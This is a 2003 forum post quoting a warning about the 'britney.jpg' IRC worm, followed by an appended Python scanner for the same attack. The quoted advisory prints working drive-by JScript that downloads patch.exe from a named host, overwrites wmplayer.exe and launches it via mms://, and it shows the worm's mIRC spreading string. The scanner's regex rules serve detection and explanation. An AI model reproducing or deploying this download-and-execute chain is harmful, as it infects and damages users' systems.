#2
27-10-2003, 13:40
Cougar
Senior member

Join Date: 16-09-2001
Location: Orléans
Age: 41
Posts: 3,850
Re: Don't play with Britney

Well, the link http://charmy.tky.hut.fi/brit.txt doesn't contain any virus/worm/...

Benjy, formatman and I haven't had any problems going to that link either.

Here's what it contains:
Quote:
2003-10-26 15:15 (+0200)

DO NOT CLICK ON britney.jpg!!!

Under no circumstances open an URL that ends with britney.jpg. It is actually an Internet Explorer / Windows Media Player exploit, as shown below.

-----
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
-----

patch.exe seems to be compressed with UPX, interesting strings can be found within.

0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww
0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/
0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri
0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,
0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21  check it out !!

This is a command it sends automatically to mIRC. This causes mIRC to send the exploit URL to all channels you are in.

It will replace/delete Windows system files. If that happens, you might get a message of this sort: "Files that are required for Windows to run properly have been replaced by unrecognized versions".

This is NOT the same thing as http://koti.phnet.fi/jonninen/mircwo...tny.txt.

15:30: At this time I don't know if the worm can be removed. If it manages to delete your Windows system files, you'll have to reinstall Windows.

15:40: Angelfire and scavenger.sharewith.us have been informed of the exploit they are hosting.

16:00: The first sighting of this was at about 14:29 in IRCnet, 14:34 (+0200) in EFnet.

According to reports, simply "repairing" the Windows install or copying the deleted files back isn't enough, since the virus also messes around with the Windows registry. You'll have to reinstall Windows.

16:30: According to reports, the URL was seen in Quakenet at 14:13. Figures.

16:40: According to reports, the URL was seen in IRCnet at 14:21 and at 14:32 in mIRC-X.

17:00: There's a list of Windows system files in the uncompressed version of patch.exe starting at around offset 0x510c0, including (but not limited to) ntoskrnl.exe, userinit.exe, services.exe, etc. There are also references to some anti-virus and firewall programs in the immediate vicinity. The virus probably disables these programs so that it can roam freely.

Reports say that the virus does not affect Windows 98, but it definitely affects at least Windows 2000 and XP. Anti-virus software does not help you at this point, since none of them recognize the virus yet.

The scavenger.sharewith.us site has been disabled. This prevents the virus from infecting machines for now, but the Angelfire page is still up and the author of the virus could modify the page to point to another location.

The IE exploit: http://www.security.nnov.ru/search/d...cid=5102

17:30: The virus might not affect Windows Media Player version 8. (see http://www.kb.cert.org/vuls/id/222044)

19:10: According to reports, the virus does affect WMP 8 as well. Better not open any suspicious links as long as you use IE.

2003-10-26 19:10 (+0200), /msg Gridle in IRCnet or EFnet if you have more information.
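The quoted advisory shows the three-part shape of this kind of drive-by: an XMLHTTP fetch of a remote binary, an ADODB.Stream write of the response body onto a local executable under Program Files, and an `mms://` navigation that makes Windows Media Player launch the overwritten file. An added example, not part of the forum post or of the brit.txt advisory, is a small scanner that flags page scripts matching that chain. The rules, the `Finding` class and the three sample scripts are constructed for this illustration; the first sample copies the structure of the quoted snippet but uses a placeholder host (`download-host.invalid`) instead of the original download location.

```python
import re
from dataclasses import dataclass, field

# Detection rules for the XMLHTTP -> ADODB.Stream -> SaveToFile chain.
# Case-insensitive: JScript accepts any casing for ProgIDs and method names.
RULES = {
    "xmlhttp_fetch":  re.compile(r'ActiveXObject\s*\(\s*["\'](?:Microsoft|MSXML2)\.XMLHTTP', re.I),
    "adodb_stream":   re.compile(r'ActiveXObject\s*\(\s*["\']ADODB\.Stream', re.I),
    "save_to_file":   re.compile(r'\.SaveToFile\s*\(\s*["\']([^"\']+)["\']', re.I),
    "handler_launch": re.compile(r'location\.href\s*=\s*["\'](?:mms|file|telnet):', re.I),
}

# Directories where a browser script has no business writing files.
SENSITIVE_DIRS = ("program files", "\\windows", "system32", "startup")
BINARY_EXTS = (".exe", ".dll", ".scr", ".com")


@dataclass
class Finding:
    verdict: str                      # "malicious", "suspicious" or "clean"
    hits: list = field(default_factory=list)   # rule names that matched
    paths: list = field(default_factory=list)  # SaveToFile targets, as written in the script


def scan_script(text: str) -> Finding:
    """Classify a script body by which parts of the drive-by chain it contains."""
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    paths = [m.group(1) for m in RULES["save_to_file"].finditer(text)]

    # JS source doubles backslashes inside string literals; collapse them before matching.
    norm = [p.lower().replace("\\\\", "\\") for p in paths]
    writes_binary = any(p.endswith(BINARY_EXTS) for p in norm)
    writes_sensitive = any(d in p for p in norm for d in SENSITIVE_DIRS)

    fetch_and_write = {"xmlhttp_fetch", "adodb_stream", "save_to_file"} <= set(hits)
    if fetch_and_write:
        # Remote content written to disk; a binary/system target or a handler
        # launch afterwards is the full pattern from the advisory.
        if writes_binary or writes_sensitive or "handler_launch" in hits:
            return Finding("malicious", hits, paths)
        return Finding("suspicious", hits, paths)
    if "adodb_stream" in hits and "save_to_file" in hits:
        # Writes to disk from script without a remote fetch: worth a look, not conclusive.
        return Finding("suspicious", hits, paths)
    return Finding("clean", hits, paths)


# Constructed samples (raw strings, so the doubled backslashes stay as JS would have them).
DRIVE_BY = r'''
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://download-host.invalid/patch.exe", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
location.href = "mms://";
'''

AJAX_ONLY = r'''
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET", "/api/status", true);
x.onreadystatechange = function () { if (x.readyState == 4) render(x.responseText); };
x.send(null);
'''

LOCAL_WRITE = r'''
var s = new ActiveXObject("ADODB.Stream");
s.Type = 2; s.Open();
s.WriteText("hello");
s.SaveToFile("C:\\Temp\\notes.txt", 2);
'''

if __name__ == "__main__":
    for label, script in (("drive-by", DRIVE_BY), ("ajax-only", AJAX_ONLY), ("local-write", LOCAL_WRITE)):
        f = scan_script(script)
        print(f"{label:12s} {f.verdict:10s} hits={f.hits} paths={f.paths}")
```

The verdict is driven by the combination, not by any single call: XMLHTTP alone is ordinary AJAX of the period and stays "clean", ADODB.Stream writing a text file is "suspicious", and only the remote-fetch-plus-write chain with a binary or Program Files target reaches "malicious". Run over proxy-captured HTML or stored page bodies, a rule like this catches the structure of the attack rather than the one hostname, which matters here because the advisory itself notes the author could repoint the page at another download location.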